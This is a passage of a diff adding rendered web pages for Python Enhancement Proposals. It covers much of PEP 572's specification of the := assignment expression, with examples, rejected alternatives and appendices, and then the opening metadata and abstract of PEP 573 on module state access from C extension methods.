    The reasoning here is similar to the two previous cases; this +ungrouped assortment of symbols and operators composed of : and += is hard to read correctly.

    +
  • +
  • Unparenthesized assignment expressions are prohibited in lambda functions. +Example:
    (lambda: x := 1) # INVALID
    +lambda: (x := 1) # Valid, but unlikely to be useful
    +(x := lambda: 1) # Valid
    +lambda line: (m := re.match(pattern, line)) and m.group(1) # Valid
    +
    +
    +

    This allows lambda to always bind less tightly than :=; having a +name binding at the top level inside a lambda function is unlikely to be of +value, as there is no way to make use of it. In cases where the name will be +used more than once, the expression is likely to need parenthesizing anyway, +so this prohibition will rarely affect code.

    +
  • +
  • Assignment expressions inside of f-strings require parentheses. Example:
    >>> f'{(x:=10)}'  # Valid, uses assignment expression
    +'10'
    +>>> x = 10
    +>>> f'{x:=10}'    # Valid, passes '=10' to formatter
    +'        10'
    +
    +
    +

    This shows that what looks like an assignment operator in an f-string is +not always an assignment operator. The f-string parser uses : to +indicate formatting options. To preserve backwards compatibility, +assignment operator usage inside of f-strings must be parenthesized. +As noted above, this usage of the assignment operator is not recommended.

    +
  • +
+
+
+

Scope of the target

+

An assignment expression does not introduce a new scope. In most +cases the scope in which the target will be bound is self-explanatory: +it is the current scope. If this scope contains a nonlocal or +global declaration for the target, the assignment expression +honors that. A lambda (being an explicit, if anonymous, function +definition) counts as a scope for this purpose.

+

There is one special case: an assignment expression occurring in a +list, set or dict comprehension or in a generator expression (below +collectively referred to as “comprehensions”) binds the target in the +containing scope, honoring a nonlocal or global declaration +for the target in that scope, if one exists. For the purpose of this +rule the containing scope of a nested comprehension is the scope that +contains the outermost comprehension. A lambda counts as a containing +scope.

+

The motivation for this special case is twofold. First, it allows us +to conveniently capture a “witness” for an any() expression, or a +counterexample for all(), for example:

+
if any((comment := line).startswith('#') for line in lines):
+    print("First comment:", comment)
+else:
+    print("There are no comments")
+
+if all((nonblank := line).strip() == '' for line in lines):
+    print("All lines are blank")
+else:
+    print("First non-blank line:", nonblank)
+
+
+

Second, it allows a compact way of updating mutable state from a +comprehension, for example:

+
# Compute partial sums in a list comprehension
+total = 0
+partial_sums = [total := total + v for v in values]
+print("Total:", total)
+
+
+

However, an assignment expression target name cannot be the same as a +for-target name appearing in any comprehension containing the +assignment expression. The latter names are local to the +comprehension in which they appear, so it would be contradictory for a +contained use of the same name to refer to the scope containing the +outermost comprehension instead.

+

For example, [i := i+1 for i in range(5)] is invalid: the for +i part establishes that i is local to the comprehension, but the +i := part insists that i is not local to the comprehension. +The same reason makes these examples invalid too:

+
[[(j := j) for i in range(5)] for j in range(5)] # INVALID
+[i := 0 for i, j in stuff]                       # INVALID
+[i+1 for i in (i := stuff)]                      # INVALID
+
+
+

While it’s technically possible to assign consistent semantics to these cases, +it’s difficult to determine whether those semantics actually make sense in the +absence of real use cases. Accordingly, the reference implementation [1] will ensure +that such cases raise SyntaxError, rather than executing with implementation +defined behaviour.

+

This restriction applies even if the assignment expression is never executed:

+
[False and (i := 0) for i, j in stuff]     # INVALID
+[i for i, j in stuff if True or (j := 1)]  # INVALID
+
+
+

For the comprehension body (the part before the first “for” keyword) and the +filter expression (the part after “if” and before any nested “for”), this +restriction applies solely to target names that are also used as iteration +variables in the comprehension. Lambda expressions appearing in these +positions introduce a new explicit function scope, and hence may use assignment +expressions with no additional restrictions.

+

Due to design constraints in the reference implementation (the symbol table +analyser cannot easily detect when names are re-used between the leftmost +comprehension iterable expression and the rest of the comprehension), named +expressions are disallowed entirely as part of comprehension iterable +expressions (the part after each “in”, and before any subsequent “if” or +“for” keyword):

+
[i+1 for i in (j := stuff)]                    # INVALID
+[i+1 for i in range(2) for j in (k := stuff)]  # INVALID
+[i+1 for i in [j for j in (k := stuff)]]       # INVALID
+[i+1 for i in (lambda: (j := stuff))()]        # INVALID
+
+
+

A further exception applies when an assignment expression occurs in a +comprehension whose containing scope is a class scope. If the rules +above were to result in the target being assigned in that class’s +scope, the assignment expression is expressly invalid. This case also raises +SyntaxError:

+
class Example:
+    [(j := i) for i in range(5)]  # INVALID
+
+
+

(The reason for the latter exception is the implicit function scope created +for comprehensions – there is currently no runtime mechanism for a +function to refer to a variable in the containing class scope, and we +do not want to add such a mechanism. If this issue ever gets resolved +this special case may be removed from the specification of assignment +expressions. Note that the problem already exists for using a +variable defined in the class scope from a comprehension.)

+

See Appendix B for some examples of how the rules for targets in +comprehensions translate to equivalent code.

+
+
+

Relative precedence of :=

+

The := operator groups more tightly than a comma in all syntactic +positions where it is legal, but less tightly than all other operators, +including or, and, not, and conditional expressions +(A if C else B). As follows from section +“Exceptional cases” above, it is never allowed at the same level as +=. In case a different grouping is desired, parentheses should be +used.

+

The := operator may be used directly in a positional function call +argument; however it is invalid directly in a keyword argument.

+

Some examples to clarify what’s technically valid or invalid:

+
# INVALID
+x := 0
+
+# Valid alternative
+(x := 0)
+
+# INVALID
+x = y := 0
+
+# Valid alternative
+x = (y := 0)
+
+# Valid
+len(lines := f.readlines())
+
+# Valid
+foo(x := 3, cat='vector')
+
+# INVALID
+foo(cat=category := 'vector')
+
+# Valid alternative
+foo(cat=(category := 'vector'))
+
+
+

Most of the “valid” examples above are not recommended, since human +readers of Python source code who are quickly glancing at some code +may miss the distinction. But simple cases are not objectionable:

+
# Valid
+if any(len(longline := line) >= 100 for line in lines):
+    print("Extremely long line:", longline)
+
+
+

This PEP recommends always putting spaces around :=, similar to +PEP 8’s recommendation for = when used for assignment, whereas the +latter disallows spaces around = used for keyword arguments.)

+
+
+

Change to evaluation order

+

In order to have precisely defined semantics, the proposal requires +evaluation order to be well-defined. This is technically not a new +requirement, as function calls may already have side effects. Python +already has a rule that subexpressions are generally evaluated from +left to right. However, assignment expressions make these side +effects more visible, and we propose a single change to the current +evaluation order:

+
    +
  • In a dict comprehension {X: Y for ...}, Y is currently +evaluated before X. We propose to change this so that X is +evaluated before Y. (In a dict display like {X: Y} this is +already the case, and also in dict((X, Y) for ...) which should +clearly be equivalent to the dict comprehension.)
  • +
+
+
+

Differences between assignment expressions and assignment statements

+

Most importantly, since := is an expression, it can be used in contexts +where statements are illegal, including lambda functions and comprehensions.

+

Conversely, assignment expressions don’t support the advanced features +found in assignment statements:

+
    +
  • Multiple targets are not directly supported:
    x = y = z = 0  # Equivalent: (z := (y := (x := 0)))
    +
    +
    +
  • +
  • Single assignment targets other than a single NAME are +not supported:
    # No equivalent
    +a[i] = x
    +self.rest = []
    +
    +
    +
  • +
  • Priority around commas is different:
    x = 1, 2  # Sets x to (1, 2)
    +(x := 1, 2)  # Sets x to 1
    +
    +
    +
  • +
  • Iterable packing and unpacking (both regular or extended forms) are +not supported:
    # Equivalent needs extra parentheses
    +loc = x, y  # Use (loc := (x, y))
    +info = name, phone, *rest  # Use (info := (name, phone, *rest))
    +
    +# No equivalent
    +px, py, pz = position
    +name, phone, email, *other_info = contact
    +
    +
    +
  • +
  • Inline type annotations are not supported:
    # Closest equivalent is "p: Optional[int]" as a separate declaration
    +p: Optional[int] = None
    +
    +
    +
  • +
  • Augmented assignment is not supported:
    total += tax  # Equivalent: (total := total + tax)
    +
    +
    +
  • +
+
+
+
+

Specification changes during implementation

+

The following changes have been made based on implementation experience and +additional review after the PEP was first accepted and before Python 3.8 was +released:

+
    +
  • for consistency with other similar exceptions, and to avoid locking in an +exception name that is not necessarily going to improve clarity for end users, +the originally proposed TargetScopeError subclass of SyntaxError was +dropped in favour of just raising SyntaxError directly. [3]
  • +
  • due to a limitation in CPython’s symbol table analysis process, the reference +implementation raises SyntaxError for all uses of named expressions inside +comprehension iterable expressions, rather than only raising them when the +named expression target conflicts with one of the iteration variables in the +comprehension. This could be revisited given sufficiently compelling examples, +but the extra complexity needed to implement the more selective restriction +doesn’t seem worthwhile for purely hypothetical use cases.
  • +
+
+
+

Examples

+
+

Examples from the Python standard library

+
+

site.py

+

env_base is only used on these lines, putting its assignment on the if +moves it as the “header” of the block.

+
    +
  • Current:
    env_base = os.environ.get("PYTHONUSERBASE", None)
    +if env_base:
    +    return env_base
    +
    +
    +
  • +
  • Improved:
    if env_base := os.environ.get("PYTHONUSERBASE", None):
    +    return env_base
    +
    +
    +
  • +
+
+
+

_pydecimal.py

+

Avoid nested if and remove one indentation level.

+
    +
  • Current:
    if self._is_special:
    +    ans = self._check_nans(context=context)
    +    if ans:
    +        return ans
    +
    +
    +
  • +
  • Improved:
    if self._is_special and (ans := self._check_nans(context=context)):
    +    return ans
    +
    +
    +
  • +
+
+
+

copy.py

+

Code looks more regular and avoid multiple nested if. +(See Appendix A for the origin of this example.)

+
    +
  • Current:
    reductor = dispatch_table.get(cls)
    +if reductor:
    +    rv = reductor(x)
    +else:
    +    reductor = getattr(x, "__reduce_ex__", None)
    +    if reductor:
    +        rv = reductor(4)
    +    else:
    +        reductor = getattr(x, "__reduce__", None)
    +        if reductor:
    +            rv = reductor()
    +        else:
    +            raise Error(
    +                "un(deep)copyable object of type %s" % cls)
    +
    +
    +
  • +
  • Improved:
    if reductor := dispatch_table.get(cls):
    +    rv = reductor(x)
    +elif reductor := getattr(x, "__reduce_ex__", None):
    +    rv = reductor(4)
    +elif reductor := getattr(x, "__reduce__", None):
    +    rv = reductor()
    +else:
    +    raise Error("un(deep)copyable object of type %s" % cls)
    +
    +
    +
  • +
+
+
+

datetime.py

+

tz is only used for s += tz, moving its assignment inside the if +helps to show its scope.

+
    +
  • Current:
    s = _format_time(self._hour, self._minute,
    +                 self._second, self._microsecond,
    +                 timespec)
    +tz = self._tzstr()
    +if tz:
    +    s += tz
    +return s
    +
    +
    +
  • +
  • Improved:
    s = _format_time(self._hour, self._minute,
    +                 self._second, self._microsecond,
    +                 timespec)
    +if tz := self._tzstr():
    +    s += tz
    +return s
    +
    +
    +
  • +
+
+
+

sysconfig.py

+

Calling fp.readline() in the while condition and calling +.match() on the if lines make the code more compact without making +it harder to understand.

+
    +
  • Current:
    while True:
    +    line = fp.readline()
    +    if not line:
    +        break
    +    m = define_rx.match(line)
    +    if m:
    +        n, v = m.group(1, 2)
    +        try:
    +            v = int(v)
    +        except ValueError:
    +            pass
    +        vars[n] = v
    +    else:
    +        m = undef_rx.match(line)
    +        if m:
    +            vars[m.group(1)] = 0
    +
    +
    +
  • +
  • Improved:
    while line := fp.readline():
    +    if m := define_rx.match(line):
    +        n, v = m.group(1, 2)
    +        try:
    +            v = int(v)
    +        except ValueError:
    +            pass
    +        vars[n] = v
    +    elif m := undef_rx.match(line):
    +        vars[m.group(1)] = 0
    +
    +
    +
  • +
+
+
+
+

Simplifying list comprehensions

+

A list comprehension can map and filter efficiently by capturing +the condition:

+
results = [(x, y, x/y) for x in input_data if (y := f(x)) > 0]
+
+
+

Similarly, a subexpression can be reused within the main expression, by +giving it a name on first use:

+
stuff = [[y := f(x), x/y] for x in range(5)]
+
+
+

Note that in both cases the variable y is bound in the containing +scope (i.e. at the same level as results or stuff).

+
+
+

Capturing condition values

+

Assignment expressions can be used to good effect in the header of +an if or while statement:

+
# Loop-and-a-half
+while (command := input("> ")) != "quit":
+    print("You entered:", command)
+
+# Capturing regular expression match objects
+# See, for instance, Lib/pydoc.py, which uses a multiline spelling
+# of this effect
+if match := re.search(pat, text):
+    print("Found:", match.group(0))
+# The same syntax chains nicely into 'elif' statements, unlike the
+# equivalent using assignment statements.
+elif match := re.search(otherpat, text):
+    print("Alternate found:", match.group(0))
+elif match := re.search(third, text):
+    print("Fallback found:", match.group(0))
+
+# Reading socket data until an empty string is returned
+while data := sock.recv(8192):
+    print("Received data:", data)
+
+
+

Particularly with the while loop, this can remove the need to have an +infinite loop, an assignment, and a condition. It also creates a smooth +parallel between a loop which simply uses a function call as its condition, +and one which uses that as its condition but also uses the actual value.

+
+
+

Fork

+

An example from the low-level UNIX world:

+
if pid := os.fork():
+    # Parent code
+else:
+    # Child code
+
+
+
+
+
+

Rejected alternative proposals

+

Proposals broadly similar to this one have come up frequently on python-ideas. +Below are a number of alternative syntaxes, some of them specific to +comprehensions, which have been rejected in favour of the one given above.

+
+

Changing the scope rules for comprehensions

+

A previous version of this PEP proposed subtle changes to the scope +rules for comprehensions, to make them more usable in class scope and +to unify the scope of the “outermost iterable” and the rest of the +comprehension. However, this part of the proposal would have caused +backwards incompatibilities, and has been withdrawn so the PEP can +focus on assignment expressions.

+
+
+

Alternative spellings

+

Broadly the same semantics as the current proposal, but spelled differently.

+
    +
  1. EXPR as NAME:
    stuff = [[f(x) as y, x/y] for x in range(5)]
    +
    +
    +

    Since EXPR as NAME already has meaning in import, +except and with statements (with different semantics), this +would create unnecessary confusion or require special-casing +(e.g. to forbid assignment within the headers of these statements).

    +

    (Note that with EXPR as VAR does not simply assign the value +of EXPR to VAR – it calls EXPR.__enter__() and assigns +the result of that to VAR.)

    +

    Additional reasons to prefer := over this spelling include:

    +
      +
    • In if f(x) as y the assignment target doesn’t jump out at you +– it just reads like if f x blah blah and it is too similar +visually to if f(x) and y.
    • +
    • In all other situations where an as clause is allowed, even +readers with intermediary skills are led to anticipate that +clause (however optional) by the keyword that starts the line, +and the grammar ties that keyword closely to the as clause:
        +
      • import foo as bar
      • +
      • except Exc as var
      • +
      • with ctxmgr() as var
      • +
      +

      To the contrary, the assignment expression does not belong to the +if or while that starts the line, and we intentionally +allow assignment expressions in other contexts as well.

      +
    • +
    • The parallel cadence between
        +
      • NAME = EXPR
      • +
      • if NAME := EXPR
      • +
      +

      reinforces the visual recognition of assignment expressions.

      +
    • +
    +
  2. +
  3. EXPR -> NAME:
    stuff = [[f(x) -> y, x/y] for x in range(5)]
    +
    +
    +

    This syntax is inspired by languages such as R and Haskell, and some +programmable calculators. (Note that a left-facing arrow y <- f(x) is +not possible in Python, as it would be interpreted as less-than and unary +minus.) This syntax has a slight advantage over ‘as’ in that it does not +conflict with with, except and import, but otherwise is +equivalent. But it is entirely unrelated to Python’s other use of +-> (function return type annotations), and compared to := +(which dates back to Algol-58) it has a much weaker tradition.

    +
  4. +
  5. Adorning statement-local names with a leading dot:
    stuff = [[(f(x) as .y), x/.y] for x in range(5)] # with "as"
    +stuff = [[(.y := f(x)), x/.y] for x in range(5)] # with ":="
    +
    +
    +

    This has the advantage that leaked usage can be readily detected, removing +some forms of syntactic ambiguity. However, this would be the only place +in Python where a variable’s scope is encoded into its name, making +refactoring harder.

    +
  6. +
  7. Adding a where: to any statement to create local name bindings:
    value = x**2 + 2*x where:
    +    x = spam(1, 4, 7, q)
    +
    +
    +

    Execution order is inverted (the indented body is performed first, followed +by the “header”). This requires a new keyword, unless an existing keyword +is repurposed (most likely with:). See PEP 3150 for prior discussion +on this subject (with the proposed keyword being given:).

    +
  8. +
  9. TARGET from EXPR:
    stuff = [[y from f(x), x/y] for x in range(5)]
    +
    +
    +

    This syntax has fewer conflicts than as does (conflicting only with the +raise Exc from Exc notation), but is otherwise comparable to it. Instead +of paralleling with expr as target: (which can be useful but can also be +confusing), this has no parallels, but is evocative.

    +
  10. +
+
+
+

Special-casing conditional statements

+

One of the most popular use-cases is if and while statements. Instead +of a more general solution, this proposal enhances the syntax of these two +statements to add a means of capturing the compared value:

+
if re.search(pat, text) as match:
+    print("Found:", match.group(0))
+
+
+

This works beautifully if and ONLY if the desired condition is based on the +truthiness of the captured value. It is thus effective for specific +use-cases (regex matches, socket reads that return '' when done), and +completely useless in more complicated cases (e.g. where the condition is +f(x) < 0 and you want to capture the value of f(x)). It also has +no benefit to list comprehensions.

+

Advantages: No syntactic ambiguities. Disadvantages: Answers only a fraction +of possible use-cases, even in if/while statements.

+
+
+

Special-casing comprehensions

+

Another common use-case is comprehensions (list/set/dict, and genexps). As +above, proposals have been made for comprehension-specific solutions.

+
    +
  1. where, let, or given:
    stuff = [(y, x/y) where y = f(x) for x in range(5)]
    +stuff = [(y, x/y) let y = f(x) for x in range(5)]
    +stuff = [(y, x/y) given y = f(x) for x in range(5)]
    +
    +
    +

    This brings the subexpression to a location in between the ‘for’ loop and +the expression. It introduces an additional language keyword, which creates +conflicts. Of the three, where reads the most cleanly, but also has the +greatest potential for conflict (e.g. SQLAlchemy and numpy have where +methods, as does tkinter.dnd.Icon in the standard library).

    +
  2. +
  3. with NAME = EXPR:
    stuff = [(y, x/y) with y = f(x) for x in range(5)]
    +
    +
    +

    As above, but reusing the with keyword. Doesn’t read too badly, and needs +no additional language keyword. Is restricted to comprehensions, though, +and cannot as easily be transformed into “longhand” for-loop syntax. Has +the C problem that an equals sign in an expression can now create a name +binding, rather than performing a comparison. Would raise the question of +why “with NAME = EXPR:” cannot be used as a statement on its own.

    +
  4. +
  5. with EXPR as NAME:
    stuff = [(y, x/y) with f(x) as y for x in range(5)]
    +
    +
    +

    As per option 2, but using as rather than an equals sign. Aligns +syntactically with other uses of as for name binding, but a simple +transformation to for-loop longhand would create drastically different +semantics; the meaning of with inside a comprehension would be +completely different from the meaning as a stand-alone statement, while +retaining identical syntax.

    +
  6. +
+

Regardless of the spelling chosen, this introduces a stark difference between +comprehensions and the equivalent unrolled long-hand form of the loop. It is +no longer possible to unwrap the loop into statement form without reworking +any name bindings. The only keyword that can be repurposed to this task is +with, thus giving it sneakily different semantics in a comprehension than +in a statement; alternatively, a new keyword is needed, with all the costs +therein.

+
+
+

Lowering operator precedence

+

There are two logical precedences for the := operator. Either it should +bind as loosely as possible, as does statement-assignment; or it should bind +more tightly than comparison operators. Placing its precedence between the +comparison and arithmetic operators (to be precise: just lower than bitwise +OR) allows most uses inside while and if conditions to be spelled +without parentheses, as it is most likely that you wish to capture the value +of something, then perform a comparison on it:

+
pos = -1
+while pos := buffer.find(search_term, pos + 1) >= 0:
+    ...
+
+
+

Once find() returns -1, the loop terminates. If := binds as loosely as += does, this would capture the result of the comparison (generally either +True or False), which is less useful.

+

While this behaviour would be convenient in many situations, it is also harder +to explain than “the := operator behaves just like the assignment statement”, +and as such, the precedence for := has been made as close as possible to +that of = (with the exception that it binds tighter than comma).

+
+
+

Allowing commas to the right

+

Some critics have claimed that the assignment expressions should allow +unparenthesized tuples on the right, so that these two would be equivalent:

+
(point := (x, y))
+(point := x, y)
+
+
+

(With the current version of the proposal, the latter would be +equivalent to ((point := x), y).)

+

However, adopting this stance would logically lead to the conclusion +that when used in a function call, assignment expressions also bind +less tight than comma, so we’d have the following confusing equivalence:

+
foo(x := 1, y)
+foo(x := (1, y))
+
+
+

The less confusing option is to make := bind more tightly than comma.

+
+
+

Always requiring parentheses

+

It’s been proposed to just always require parentheses around an +assignment expression. This would resolve many ambiguities, and +indeed parentheses will frequently be needed to extract the desired +subexpression. But in the following cases the extra parentheses feel +redundant:

+
# Top level in if
+if match := pattern.match(line):
+    return match.group(1)
+
+# Short call
+len(lines := f.readlines())
+
+
+
+
+
+

Frequently Raised Objections

+
+

Why not just turn existing assignment into an expression?

+

C and its derivatives define the = operator as an expression, rather than +a statement as is Python’s way. This allows assignments in more contexts, +including contexts where comparisons are more common. The syntactic similarity +between if (x == y) and if (x = y) belies their drastically different +semantics. Thus this proposal uses := to clarify the distinction.

+
+
+

With assignment expressions, why bother with assignment statements?

+

The two forms have different flexibilities. The := operator can be used +inside a larger expression; the = statement can be augmented to += and +its friends, can be chained, and can assign to attributes and subscripts.

+
+
+

Why not use a sublocal scope and prevent namespace pollution?

+

Previous revisions of this proposal involved sublocal scope (restricted to a +single statement), preventing name leakage and namespace pollution. While a +definite advantage in a number of situations, this increases complexity in +many others, and the costs are not justified by the benefits. In the interests +of language simplicity, the name bindings created here are exactly equivalent +to any other name bindings, including that usage at class or module scope will +create externally-visible names. This is no different from for loops or +other constructs, and can be solved the same way: del the name once it is +no longer needed, or prefix it with an underscore.

+

(The author wishes to thank Guido van Rossum and Christoph Groth for their +suggestions to move the proposal in this direction. [2])

+
+
+
+

Style guide recommendations

+

As expression assignments can sometimes be used equivalently to statement +assignments, the question of which should be preferred will arise. For the +benefit of style guides such as PEP 8, two recommendations are suggested.

+
    +
  1. If either assignment statements or assignment expressions can be +used, prefer statements; they are a clear declaration of intent.
  2. +
  3. If using assignment expressions would lead to ambiguity about +execution order, restructure it to use statements instead.
  4. +
+
+
+

Acknowledgements

+

The authors wish to thank Alyssa Coghlan and Steven D’Aprano for their +considerable contributions to this proposal, and members of the +core-mentorship mailing list for assistance with implementation.

+
+
+

Appendix A: Tim Peters’s findings

+

Here’s a brief essay Tim Peters wrote on the topic.

+

I dislike “busy” lines of code, and also dislike putting conceptually +unrelated logic on a single line. So, for example, instead of:

+
i = j = count = nerrors = 0
+
+
+

I prefer:

+
i = j = 0
+count = 0
+nerrors = 0
+
+
+

instead. So I suspected I’d find few places I’d want to use +assignment expressions. I didn’t even consider them for lines already +stretching halfway across the screen. In other cases, “unrelated” +ruled:

+
mylast = mylast[1]
+yield mylast[0]
+
+
+

is a vast improvement over the briefer:

+
yield (mylast := mylast[1])[0]
+
+
+

The original two statements are doing entirely different conceptual +things, and slamming them together is conceptually insane.

+

In other cases, combining related logic made it harder to understand, +such as rewriting:

+
while True:
+    old = total
+    total += term
+    if old == total:
+        return total
+    term *= mx2 / (i*(i+1))
+    i += 2
+
+
+

as the briefer:

+
while total != (total := total + term):
+    term *= mx2 / (i*(i+1))
+    i += 2
+return total
+
+
+

The while test there is too subtle, crucially relying on strict +left-to-right evaluation in a non-short-circuiting or method-chaining +context. My brain isn’t wired that way.

+

But cases like that were rare. Name binding is very frequent, and +“sparse is better than dense” does not mean “almost empty is better +than sparse”. For example, I have many functions that return None +or 0 to communicate “I have nothing useful to return in this case, +but since that’s expected often I’m not going to annoy you with an +exception”. This is essentially the same as regular expression search +functions returning None when there is no match. So there was lots +of code of the form:

+
result = solution(xs, n)
+if result:
+    # use result
+
+
+

I find that clearer, and certainly a bit less typing and +pattern-matching reading, as:

+
if result := solution(xs, n):
+    # use result
+
+
+

It’s also nice to trade away a small amount of horizontal whitespace +to get another _line_ of surrounding code on screen. I didn’t give +much weight to this at first, but it was so very frequent it added up, +and I soon enough became annoyed that I couldn’t actually run the +briefer code. That surprised me!

+

There are other cases where assignment expressions really shine. +Rather than pick another from my code, Kirill Balunov gave a lovely +example from the standard library’s copy() function in copy.py:

+
reductor = dispatch_table.get(cls)
+if reductor:
+    rv = reductor(x)
+else:
+    reductor = getattr(x, "__reduce_ex__", None)
+    if reductor:
+        rv = reductor(4)
+    else:
+        reductor = getattr(x, "__reduce__", None)
+        if reductor:
+            rv = reductor()
+        else:
+            raise Error("un(shallow)copyable object of type %s" % cls)
+
+
+

The ever-increasing indentation is semantically misleading: the logic +is conceptually flat, “the first test that succeeds wins”:

+
if reductor := dispatch_table.get(cls):
+    rv = reductor(x)
+elif reductor := getattr(x, "__reduce_ex__", None):
+    rv = reductor(4)
+elif reductor := getattr(x, "__reduce__", None):
+    rv = reductor()
+else:
+    raise Error("un(shallow)copyable object of type %s" % cls)
+
+
+

Using easy assignment expressions allows the visual structure of the +code to emphasize the conceptual flatness of the logic; +ever-increasing indentation obscured it.

+

A smaller example from my code delighted me, both allowing to put +inherently related logic in a single line, and allowing to remove an +annoying “artificial” indentation level:

+
diff = x - x_base
+if diff:
+    g = gcd(diff, n)
+    if g > 1:
+        return g
+
+
+

became:

+
if (diff := x - x_base) and (g := gcd(diff, n)) > 1:
+    return g
+
+
+

That if is about as long as I want my lines to get, but remains easy +to follow.

+

So, in all, in most lines binding a name, I wouldn’t use assignment +expressions, but because that construct is so very frequent, that +leaves many places I would. In most of the latter, I found a small +win that adds up due to how often it occurs, and in the rest I found a +moderate to major win. I’d certainly use it more often than ternary +if, but significantly less often than augmented assignment.

+
+

A numeric example

+

I have another example that quite impressed me at the time.

+

Where all variables are positive integers, and a is at least as large +as the n’th root of x, this algorithm returns the floor of the n’th +root of x (and roughly doubling the number of accurate bits per +iteration):

+
while a > (d := x // a**(n-1)):
+    a = ((n-1)*a + d) // n
+return a
+
+
+

It’s not obvious why that works, but is no more obvious in the “loop +and a half” form. It’s hard to prove correctness without building on +the right insight (the “arithmetic mean - geometric mean inequality”), +and knowing some non-trivial things about how nested floor functions +behave. That is, the challenges are in the math, not really in the +coding.

+

If you do know all that, then the assignment-expression form is easily +read as “while the current guess is too large, get a smaller guess”, +where the “too large?” test and the new guess share an expensive +sub-expression.

+

To my eyes, the original form is harder to understand:

+
while True:
+    d = x // a**(n-1)
+    if a <= d:
+        break
+    a = ((n-1)*a + d) // n
+return a
+
+
+
+
+
+

Appendix B: Rough code translations for comprehensions

+

This appendix attempts to clarify (though not specify) the rules when +a target occurs in a comprehension or in a generator expression. +For a number of illustrative examples we show the original code, +containing a comprehension, and the translation, where the +comprehension has been replaced by an equivalent generator function +plus some scaffolding.

+

Since [x for ...] is equivalent to list(x for ...) these +examples all use list comprehensions without loss of generality. +And since these examples are meant to clarify edge cases of the rules, +they aren’t trying to look like real code.

+

Note: comprehensions are already implemented via synthesizing nested +generator functions like those in this appendix. The new part is +adding appropriate declarations to establish the intended scope of +assignment expression targets (the same scope they resolve to as if +the assignment were performed in the block containing the outermost +comprehension). For type inference purposes, these illustrative +expansions do not imply that assignment expression targets are always +Optional (but they do indicate the target binding scope).

+

Let’s start with a reminder of what code is generated for a generator +expression without assignment expression.

+
    +
  • Original code (EXPR usually references VAR):
    def f():
    +    a = [EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation (let’s not worry about name conflicts):
    def f():
    +    def genexpr(iterator):
    +        for VAR in iterator:
    +            yield EXPR
    +    a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Let’s add a simple assignment expression.

+
    +
  • Original code:
    def f():
    +    a = [TARGET := EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation:
    def f():
    +    if False:
    +        TARGET = None  # Dead code to ensure TARGET is a local variable
    +    def genexpr(iterator):
    +        nonlocal TARGET
    +        for VAR in iterator:
    +            TARGET = EXPR
    +            yield TARGET
    +    a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Let’s add a global TARGET declaration in f().

+
    +
  • Original code:
    def f():
    +    global TARGET
    +    a = [TARGET := EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation:
    def f():
    +    global TARGET
    +    def genexpr(iterator):
    +        global TARGET
    +        for VAR in iterator:
    +            TARGET = EXPR
    +            yield TARGET
    +    a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Or instead let’s add a nonlocal TARGET declaration in f().

+
    +
  • Original code:
    def g():
    +    TARGET = ...
    +    def f():
    +        nonlocal TARGET
    +        a = [TARGET := EXPR for VAR in ITERABLE]
    +
    +
    +
  • +
  • Translation:
    def g():
    +    TARGET = ...
    +    def f():
    +        nonlocal TARGET
    +        def genexpr(iterator):
    +            nonlocal TARGET
    +            for VAR in iterator:
    +                TARGET = EXPR
    +                yield TARGET
    +        a = list(genexpr(iter(ITERABLE)))
    +
    +
    +
  • +
+

Finally, let’s nest two comprehensions.

+
    +
  • Original code:
    def f():
    +    a = [[TARGET := i for i in range(3)] for j in range(2)]
    +    # I.e., a = [[0, 1, 2], [0, 1, 2]]
    +    print(TARGET)  # prints 2
    +
    +
    +
  • +
  • Translation:
    def f():
    +    if False:
    +        TARGET = None
    +    def outer_genexpr(outer_iterator):
    +        nonlocal TARGET
    +        def inner_generator(inner_iterator):
    +            nonlocal TARGET
    +            for i in inner_iterator:
    +                TARGET = i
    +                yield i
    +        for j in outer_iterator:
    +            yield list(inner_generator(range(3)))
    +    a = list(outer_genexpr(range(2)))
    +    print(TARGET)
    +
    +
    +
  • +
+
+
+

Appendix C: No Changes to Scope Semantics

+

Because it has been a point of confusion, note that nothing about Python’s +scoping semantics is changed. Function-local scopes continue to be resolved +at compile time, and to have indefinite temporal extent at run time (“full +closures”). Example:

+
a = 42
+def f():
+    # `a` is local to `f`, but remains unbound
+    # until the caller executes this genexp:
+    yield ((a := i) for i in range(3))
+    yield lambda: a + 100
+    print("done")
+    try:
+        print(f"`a` is bound to {a}")
+        assert False
+    except UnboundLocalError:
+        print("`a` is not yet bound")
+
+
+

Then:

+
>>> results = list(f()) # [genexp, lambda]
+done
+`a` is not yet bound
+# The execution frame for f no longer exists in CPython,
+# but f's locals live so long as they can still be referenced.
+>>> list(map(type, results))
+[<class 'generator'>, <class 'function'>]
+>>> list(results[0])
+[0, 1, 2]
+>>> results[1]()
+102
+>>> a
+42
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0572.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0573/index.html b/pep-0573/index.html new file mode 100644 index 00000000000..1d5c2825e82 --- /dev/null +++ b/pep-0573/index.html @@ -0,0 +1,588 @@ + + + + + + + + PEP 573 – Module State Access from C Extension Methods | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 573 – Module State Access from C Extension Methods

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>, +Alyssa Coghlan <ncoghlan at gmail.com>, +Eric Snow <ericsnowcurrently at gmail.com>, +Marcel Plch <gmarcel.plch at gmail.com>
+
BDFL-Delegate:
+
Stefan Behnel
+
Discussions-To:
+
Import-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Jun-2016
+
Python-Version:
+
3.9
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add a way for CPython extension methods to access context, +such as the state of the modules they are defined in.

+

This will allow extension methods to use direct pointer dereferences +rather than PyState_FindModule for looking up module state, reducing or +eliminating the performance cost of using module-scoped state over process +global state.

+

This fixes one of the remaining roadblocks for adoption of PEP 3121 (Extension +module initialization and finalization) and PEP 489 +(Multi-phase extension module initialization).

+

